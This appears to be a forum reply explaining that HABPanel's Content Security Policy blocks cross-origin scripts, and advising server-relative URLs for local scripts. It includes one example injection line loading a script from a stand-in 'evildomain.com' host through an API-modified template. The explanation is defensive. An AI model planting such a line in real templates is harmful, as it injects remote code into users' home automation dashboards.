Yes, the CSP (more info: https://content-security-policy.com) was indeed added on purpose, to help mitigate XSS attacks which would be trivial with HABPanel templates if it weren’t there - since the templates can be modified with an API call, an attacker would only have to change the template to e.g.
<div oc-lazy-load="['https://evildomain.com/evilscript.js']"> to inject malicious code.
Therefore only scripts from the same origin (that is, the openHAB server HABPanel is running on) can be loaded. And even if the server is the same, rpi.fritz.box:8080 and 192.168.1.22:8080 are NOT the same origin. The protocol, host and port must match.
The best way to ensure the local scripts are loaded probably is to use “server-relative” URLs like
<div oc-lazy-load="['/static/temp-plot/plot_solar_local.js']"> - these will always work.